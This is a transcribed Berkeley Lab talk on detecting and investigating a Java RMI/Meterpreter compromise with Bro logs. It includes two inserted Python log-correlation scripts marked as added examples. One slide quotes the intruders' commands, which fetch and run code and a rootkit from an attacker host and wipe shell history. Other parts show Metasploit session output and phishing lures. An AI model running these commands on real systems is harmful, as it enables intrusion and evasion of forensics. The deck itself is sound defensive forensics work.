p0wnage and detection with bro
p0wnage and detection with Bro Aashish Sharma & Vincent Stoffer - PowerPoint PPT Presentation
  1. p0wnage and detection with Bro Aashish Sharma & Vincent Stoffer Berkeley Lab

  2. 80 Years of World-Leading Team Science at Lawrence Berkeley National Laboratory
  • Managed and operated by UC for the U.S. Department of Energy
  • >200 University of California faculty on staff at LBNL
  • 4200 Employees, ~$820M/year Budget
  • 13 Nobel Prizes
  • 63 members of the National Academy of Sciences (~3% of the Academy)
  • 18 members of the National Academy of Engineering, 2 of the Institute of Medicine

  3. World-Class User Facilities Serving the Nation and the World
  Advanced Light Source · Molecular Foundry · Joint Genome Institute · Energy Sciences Network · FLEXlab · National Energy Research Supercomputer
  Over 10,000 visiting scientists (~2/3 from universities) use Berkeley Lab research facilities each year

  4. LBL is the birthplace of Bro
  ● Bro logs on disk from 1990s
  ● Close collaboration with the Bro team
  ● We use Bro for everything!
    ○ Of course we have other tools also

  5. Releasing our 100G Intrusion Detection document http://go.lbl.gov/100g

  6. How do we do IR with Bro?
  ● No SIEM (except Gmail)
    ○ so we make Bro act as the SIEM
  ● Central log repo + multiple “crunching” machines
  ● GNU parallel and command line tools
    ○ (grep, awk, sed, sort, cut, cf, hf, etc.)
  ● Why?
    ○ It’s still the fastest we’ve found and the team has lots of old school tricks
  ● Bro is among the tools that detect incidents, but it _always_ helps solve them

  7. Fireeye alert
    alerts:
      msg: normal
      product: Web MPS
      version: 7.1.1.209016
      appliance: fireeye.lbl.gov
      alert (id:1481036, name:malware-callback):
        severity: crit
        explanation:
          protocol: tcp
          analysis: content
          malware-detected:
            malware (name:Trojan.Meterpreter):
              stype: bot-command
              sid: 33336028
              protocol: tcp
              port: 8080
              address: 209.112.253.167
              location: US/CO/Golden
              channel: POST /g6uP_DrmyU6s3EzbVypHJ/ HTTP/1.1::~~User-Agent: Java/1.4.2_03::~~Host: 209.112.253.167:8080::~~Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2::~~Connection: keep-alive::~~Content-Type: application/x-www-form-urlencoded::~~Content-Length: 126::~~::~~
        src:
          vlan: 0
          ip: 131.243.xxx.xxx
          host: xxxxx.lbl.gov
          port: 60668
          mac:
        dst:
          ip: 209.112.253.167
          mac:
          port: 8080
        occurred: 2014-05-25T05:28:38Z
        mode: tap
        label: A1
        interface (mode:tap, label:A1): pether3
        alert-url: https://fireeye.lbl.gov/event_stream/events_for_bot?ev_id=1481036
        action: notified

  8. Quick...to the conn logs!
  Correlation with the Fireeye IP (standard conn.log columns after the timestamp: orig_h orig_p resp_h resp_p proto service duration orig_bytes resp_bytes conn_state local_orig missed_bytes history orig_pkts orig_ip_bytes resp_pkts resp_ip_bytes):
    May 24 22:20:31 209.112.253.167 39158 131.243.xxx.xxx 1099 tcp - 4.721549 203 44 SF F 0 ShADadfF 7 575 6 364
    May 24 22:20:32 131.243.xxx.xxx 60485 209.112.253.167 8080 tcp http 3.514699 419 30552 SF T 0 ShADadfFr 23 1623 27 31928
  How did they find it? Scanner blocked soon after…
    May 23 22:12:46 50.21.187.18 47010 131.243.xxx.xxx 1099 tcp - 0.062209 0 0 RSTO F 0 ShR 2 80 44

  9. Java RMI
  ● Allows you to upload Java application components/bundles (among other things)
  ● Often used for app-specific functionality
  ● Several vulnerabilities with older versions
  ● Defaults to port 1099/tcp

  10. more conn.log
  First we see the RMI upload:
    May 24 22:16:56 107.161.158.254 42364 131.243.xxx.xxx 1099 tcp - 2.380179 198 2640 SF F 0 ShADadfF
  This looks like Metasploit:
    May 24 22:20:31 131.243.xxx.xxx 60482 209.112.253.167 8080 tcp http 5.372625 180 7154 SF T 0 ShADadFf
    May 24 22:20:32 CJ36Ya23iZgqSwZqI 131.243.xxx.xxx 60485 209.112.253.167 8080 tcp http 3.514699 419 30552 SF T 0 ShADadfFr

  11. Then the http logs
  (standard http.log columns after the timestamp: uid orig_h orig_p resp_h resp_p trans_depth method host uri referrer user_agent request_body_len response_body_len status_code status_msg info_code info_msg filename tags username password proxied orig_fuids orig_mime_types resp_fuids resp_mime_types)
  Confirming the GET of our exploit:
    May 24 22:20:31 CWXEiw4opxO6pQqMHb 131.243.xxx.xxx 60482 209.112.253.167 8080 1 GET 209.112.253.167 /OJpl3rP6kDDz/femw.jar - Java/1.4.2_03 0 7015 200 OK - - - (empty) - - - - - FNx3Px2NhlZziiztJk application/zip
    May 24 22:20:32 CJ36Ya23iZgqSwZqI 131.243.xxx.xxx 60485 209.112.253.167 8080 1 GET 209.112.253.167 /INITJM - Java/1.4.2_03 0 30470 200 OK - - - (empty) - - - - - FbzYLI3zFZam4tVf21 application/octet-stream
  Then the reverse shell/meterpreter session begins:
    May 24 22:20:36 CFz00C2y9yukeY98L1 131.243.xxx.xxx 60486 209.112.253.167 8080 1 POST 209.112.253.167 /RvGS_VIGdv5tex3PT5ALQ/ - Java/1.4.2_03 4 38916 200 OK - - - (empty) - - - FFiphrjsAzy2OYZY8 text/plain FZJKjl14HsEpevI4b6 application/octet-stream
    May 24 22:20:36 CBFoYM26kAlx03AE84 131.243.xxx.xxx 60487 209.112.253.167 8080 1 POST 209.112.253.167 /RvGS_VIGdv5tex3PT5ALQ/ - Java/1.4.2_03 888 0 200 OK - - - (empty) - - - FHfnM73a2CtqDw5yA9 application/octet-stream - -
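Slides 8 through 11 are one procedure: take the external IP from the alert, find the inbound tcp/1099 session, then find the victim's outbound Java fetch of a .jar and the POST callbacks that follow. The script below is an added example, not code from the talk or from the Bro project: it parses standard Bro 2.x TSV logs by their #fields header and applies that correlation. The conn.log and http.log lines are constructed to mirror the slides (epoch timestamps, victim address 131.243.10.20 and the 131.243.0.0/16 site prefix are assumptions), and the 600-second window is an assumption too.

```python
"""Correlate a Java RMI intrusion across Bro conn.log and http.log (added example)."""
import ipaddress

LOCAL_NET = ipaddress.ip_network("131.243.0.0/16")   # assumed site prefix
RMI_PORT = "1099"

# Constructed sample data mirroring slides 8-11 (not real log extracts).
CONN_LOG = """\
#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\tservice\tduration\torig_bytes\tresp_bytes\tconn_state\thistory
1400970766.0\tCscan1\t50.21.187.18\t47010\t131.243.10.20\t1099\ttcp\t-\t0.062209\t0\t0\tRSTO\tShR
1401056216.0\tCrmi1\t107.161.158.254\t42364\t131.243.10.20\t1099\ttcp\t-\t2.380179\t198\t2640\tSF\tShADadfF
1401056431.0\tCrmi2\t209.112.253.167\t39158\t131.243.10.20\t1099\ttcp\t-\t4.721549\t203\t44\tSF\tShADadfF
1401056431.5\tCWXEiw4opxO6pQqMHb\t131.243.10.20\t60482\t209.112.253.167\t8080\ttcp\thttp\t5.372625\t180\t7154\tSF\tShADadFf
1401056432.0\tCJ36Ya23iZgqSwZqI\t131.243.10.20\t60485\t209.112.253.167\t8080\ttcp\thttp\t3.514699\t419\t30552\tSF\tShADadfFr
"""

HTTP_LOG = """\
#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tmethod\thost\turi\tuser_agent\trequest_body_len\tresponse_body_len\tstatus_code\tresp_mime_types
1401056431.5\tCWXEiw4opxO6pQqMHb\t131.243.10.20\t60482\t209.112.253.167\t8080\tGET\t209.112.253.167\t/OJpl3rP6kDDz/femw.jar\tJava/1.4.2_03\t0\t7015\t200\tapplication/zip
1401056432.0\tCJ36Ya23iZgqSwZqI\t131.243.10.20\t60485\t209.112.253.167\t8080\tGET\t209.112.253.167\t/INITJM\tJava/1.4.2_03\t0\t30470\t200\tapplication/octet-stream
1401056436.0\tCFz00C2y9yukeY98L1\t131.243.10.20\t60486\t209.112.253.167\t8080\tPOST\t209.112.253.167\t/RvGS_VIGdv5tex3PT5ALQ/\tJava/1.4.2_03\t4\t38916\t200\tapplication/octet-stream
1401056436.1\tCBFoYM26kAlx03AE84\t131.243.10.20\t60487\t209.112.253.167\t8080\tPOST\t209.112.253.167\t/RvGS_VIGdv5tex3PT5ALQ/\tJava/1.4.2_03\t888\t0\t200\t-
1401056500.0\tCbenign\t131.243.10.99\t50000\t93.184.216.34\t80\tGET\texample.com\t/index.html\tMozilla/5.0\t0\t1256\t200\ttext/html
"""


def parse_bro_log(text):
    """Parse Bro/Zeek TSV using the #fields header, so column order does not matter."""
    fields, records = [], []
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line and not line.startswith("#"):
            records.append(dict(zip(fields, line.split("\t"))))
    return records


def is_local(ip):
    return ipaddress.ip_address(ip) in LOCAL_NET


def rmi_sessions_to(conn, victim):
    """Inbound tcp/1099 connections from external hosts to `victim`, split into
    completed sessions (originator sent data) and bare probes (RSTO, no payload)."""
    done, probes = [], []
    for c in conn:
        if (c["proto"], c["id.resp_p"], c["id.resp_h"]) != ("tcp", RMI_PORT, victim):
            continue
        if is_local(c["id.orig_h"]):
            continue
        sent = 0 if c["orig_bytes"] == "-" else int(c["orig_bytes"])
        (done if c["conn_state"] == "SF" and sent > 0 else probes).append(c)
    return done, probes


def find_rmi_compromises(conn, http, window=600):
    """One finding per .jar fetched by a local host with a Java user agent that
    follows a completed external RMI session within `window` seconds, i.e. the
    java_rmi_server sequence on the slides.  Later POSTs from the victim to the
    same server are listed as the likely Meterpreter callback channel."""
    findings = []
    for h in http:
        if not (is_local(h["id.orig_h"]) and h["method"] == "GET"
                and h["user_agent"].startswith("Java/")
                and h["uri"].lower().endswith(".jar")):
            continue
        victim, t_jar = h["id.orig_h"], float(h["ts"])
        done, probes = rmi_sessions_to(conn, victim)
        clients = sorted({c["id.orig_h"] for c in done
                          if 0 <= t_jar - float(c["ts"]) <= window})
        if not clients:
            continue            # a Java .jar download with no preceding RMI session
        callbacks = [p["uid"] for p in http
                     if p["id.orig_h"] == victim and p["id.resp_h"] == h["id.resp_h"]
                     and p["method"] == "POST" and float(p["ts"]) >= t_jar]
        findings.append({
            "victim": victim,
            "rmi_clients": clients,              # external hosts that spoke RMI first
            "payload_server": h["id.resp_h"],    # where the stager came from
            "jar_uid": h["uid"],
            "callback_uids": callbacks,
            "scanners": sorted({c["id.orig_h"] for c in probes}),
        })
    return findings


if __name__ == "__main__":
    for f in find_rmi_compromises(parse_bro_log(CONN_LOG), parse_bro_log(HTTP_LOG)):
        print(f)
```

Keying on the #fields header rather than fixed column positions is what lets the same script run over logs from different Bro versions; the window is deliberately wide because the slides show the RMI upload four minutes before the payload fetch.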

  12. Confirmed with Metasploit
    msf exploit(java_rmi_server) > exploit
    [*] Started reverse handler on 131.243.xx.xxx:4444
    [*] Using URL: http://0.0.0.0:4445/
    [*] Local IP: http://131.243.xx.xxx:4445/
    [*] Connected and sending request for http://131.243.xx.xxx:4445//KqgMtwKu.jar
    [*] 131.243.yyy.yyy java_rmi_server - Replied to request for payload JAR
    [*] Sending stage (30355 bytes) to 131.243.yyy.yyy
    [*] Meterpreter session 1 opened (131.243.xx.xxx:4444 -> 131.243.yyy.yyy:33597) at 2014-05-25 12:19:12 -0700
    [+] Target 131.243.yyy.yyy:1099 may be exploitable...
    [*] Server stopped.
    meterpreter > getuid
    Server username: root
    meterpreter > sysinfo
    Computer    : xxxxx.lbl.gov
    OS          : Linux 2.4.20-28.8smp (i386)
    Meterpreter : java/java

  13. irc logs
  irc-limited
    May 24 22:24:44 #35 131.243.xxx.xxx/60589 > 50.57.189.33/1025 NICK LTVZH
    May 24 22:24:44 #35 131.243.xxx.xxx/60589 > 50.57.189.33/1025 USER BJQOIF localhost localhost :DRCE
    May 24 22:24:45 #35 131.243.xxx.xxx/60589 > 50.57.189.33/1025 50-57-189-33.static.cloud-ips.com JOIN #dev# with channel key: ':fucku'
    May 24 22:24:45 #35 131.243.xxx.xxx/60589 > 50.57.189.33/1025 50-57-189-33.static.cloud-ips.com JOIN #dev#
  irc-detailed
    May 24 22:24:44 #w9-62 131.243.xxx.xxx/60589 > 50.57.189.33/1025 < (RoxNet.net) NOTICE Auth :Welcome to ^BRoxNet^B!
    May 24 22:24:44 #w9-62 131.243.xxx.xxx/60589 > 50.57.189.33/1025 < (RoxNet.net) 001 LTVZH :Welcome to the RoxNet IRC Network LTVZH!BJQOIF@XXXXX.lbl.gov
    May 24 22:24:44 #w9-62 131.243.xxx.xxx/60589 > 50.57.189.33/1025 < (RoxNet.net) 002 LTVZH :Your host is RoxNet.net, running version InspIRCd-2.0
    May 24 22:24:44 #w9-62 131.243.xxx.xxx/60589 > 50.57.189.33/1025 < (RoxNet.net) 003 LTVZH :This server was created 03:45:33 May 11 2014
    May 24 22:24:44 #w9-62 131.243.xxx.xxx/60589 > 50.57.189.33/1025 < (RoxNet.net) 004 LTVZH RoxNet.net InspIRCd-2.0 BHIRSWciorswx ACHIMNOPQRSTYabcghijklmnopqrstuvz HIYabghjkloqv

  14. IRC detail logs
    #dev# :uhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
    (q!z@oper.z0r.us) PRIVMSG #dev# :.ip 131.243.x.x
    (NSAGOV!eggdrop@rapesec2ee8uk.members.linode.com) PRIVMSG #dev# :Range: 131.243.0.0 - 131.243.255.255 :: NetName: LBL-IP-NET2 :: Organization: Lawrence Berkeley National Laboratory :: Country: US
    (syn!whothef@master.net) PRIVMSG #dev# :^A ACTION shoves clothes into bag ^A
    (q!z@oper.z0r.us) PRIVMSG #dev# :see you in mexico
    (syn!whothef@master.net) PRIVMSG #dev# :mexico is just where im telling you snitches im going
    (syn!whothef@master.net) PRIVMSG #dev# :YOU CAN BOTH FRY
    (syn!whothef@master.net) PRIVMSG #dev# :forte prob left
    (syn!whothef@master.net) PRIVMSG #dev# :fuck you
    (q!z@oper.z0r.us) PRIVMSG #dev# :ROFL
    (syn!whothef@master.net) PRIVMSG #dev# :LOL
    (syn!whothef@master.net) PRIVMSG #dev# :idk if we should keep it kaiten'd man
    (syn!whothef@master.net) PRIVMSG #dev# :lol
    (syn!whothef@master.net) PRIVMSG #dev# :i can try to rootkit it
    (syn!whothef@master.net) PRIVMSG #dev# :man thats scary as fuck

  15. Watching Metasploit with Time Machine
  CHAT CLIENT:
    wget http://rapesec.servehttp.com/conf.c
    gcc -o /tmp/... /tmp/conf.c;/tmp/...
    rm -rf conf.c; history -c
  CLEAR HISTORY:
    rm -rf ~/.bash_history;ln -s /dev/null ~/.bash_history
  ROOTKIT:
    cd /tmp; wget http://rapesec.servehttp.com/jsnow.tar.gz
    tar zxf jsnow.tar.gz;rm -rf jsnow.tar.gz;cd jsnow;./setup.sh

  16. Feeding back into Bro: HTTP_SensitiveURI (example of extending a policy)
  Seen in Time Machine: wget http://rapesec.servehttp.com/jsnow.tar.gz

    redef sensitive_URIs += /jsnow\.tar\.gz/;

    event http_request(c: connection, method: string, original_URI: string,
                       unescaped_URI: string, version: string) &priority=3
        {
        local url = build_url_http(c$http);
        local message = fmt("%s %s", c$http$method, url);

        if ( sensitive_URIs in unescaped_URI )
            {
            NOTICE([$note=HTTP_SensitiveURI,
                    $msg=message,
                    $method=c$http$method,
                    $conn=c,
                    $URL=url,
                    $identifier=cat(c$id$orig_h, url),
                    $suppress_for=180 min]);
            }
        }
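The part of that policy that matters operationally is the last two fields: $identifier and $suppress_for make Bro raise the notice once per (client, URL) pair and drop repeats for three hours, so a box re-fetching the rootkit in a loop does not flood the analyst. The script below is an added example, not from the talk or from Bro, re-creating that behaviour in Python over http.log so the semantics can be checked on sample data: the pattern and the 180-minute window are the slide's, the log lines are constructed, and the hosts and timestamps are assumptions.

```python
"""Sensitive-URI notice with per-identifier suppression over http.log (added example)."""
import re

SENSITIVE_URIS = re.compile(r"jsnow\.tar\.gz")   # pattern from the slide
SUPPRESS_FOR = 180 * 60                          # 180 min, as in the slide's NOTICE

# Constructed http.log: same host fetches the file twice inside the window,
# a second host fetches it, a near-miss URI, then the first host again 3h+ later.
HTTP_LOG = """\
#fields\tts\tuid\tid.orig_h\tid.resp_h\tmethod\thost\turi
1401056600.0\tC1\t131.243.10.20\t198.51.100.7\tGET\trapesec.servehttp.com\t/jsnow.tar.gz
1401056900.0\tC2\t131.243.10.20\t198.51.100.7\tGET\trapesec.servehttp.com\t/jsnow.tar.gz
1401057000.0\tC3\t131.243.10.21\t198.51.100.7\tGET\trapesec.servehttp.com\t/jsnow.tar.gz
1401057100.0\tC4\t131.243.10.22\t198.51.100.9\tGET\tmirror.example.org\t/snow.tar.gz
1401067500.0\tC5\t131.243.10.20\t198.51.100.7\tGET\trapesec.servehttp.com\t/jsnow.tar.gz
"""


def parse_bro_log(text):
    """Parse Bro/Zeek TSV using the #fields header."""
    fields, records = [], []
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line and not line.startswith("#"):
            records.append(dict(zip(fields, line.split("\t"))))
    return records


def build_url_http(rec):
    """Host plus URI, the same string Bro's build_url_http() builds for the identifier."""
    return rec["host"] + rec["uri"]


def sensitive_uri_notices(records, pattern=SENSITIVE_URIS, suppress_for=SUPPRESS_FOR):
    """Return one notice per request whose URI matches `pattern`, except that a
    repeat with the same (orig_h + url) identifier inside `suppress_for` seconds
    of the last *raised* notice is dropped.  Suppressed hits do not extend the
    window, which matches how Bro's NOTICE() treats $suppress_for."""
    last_raised = {}
    notices = []
    for rec in sorted(records, key=lambda r: float(r["ts"])):
        if not pattern.search(rec["uri"]):
            continue
        url = build_url_http(rec)
        ident = rec["id.orig_h"] + url          # cat(c$id$orig_h, url)
        ts = float(rec["ts"])
        prev = last_raised.get(ident)
        if prev is not None and ts - prev < suppress_for:
            continue                             # still suppressed
        last_raised[ident] = ts
        notices.append({"ts": ts, "uid": rec["uid"], "identifier": ident,
                        "msg": f"{rec['method']} {url}"})
    return notices


if __name__ == "__main__":
    for n in sensitive_uri_notices(parse_bro_log(HTTP_LOG)):
        print(n)
```

Because the identifier includes the client address, a second infected host fetching the same file still alerts immediately; widening the identifier to just the URL would instead hide the second victim for three hours, which is the trade-off to think about before tuning $suppress_for.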

  17. Gmail phishing attack (Need for a new policy)

  18. Subject: Important document Please see the attached file for your review. Thank you, Loan Broker Document8229tax.PDF <http://www.newfleld.com/>

  19. Subject: Important document Please see the attached file for your review. Thank you, User Lab-Docs.Pdf <http://www.newfleld.com/>

  20. Delivered to ~1700 people, 800 Lab and 900 external
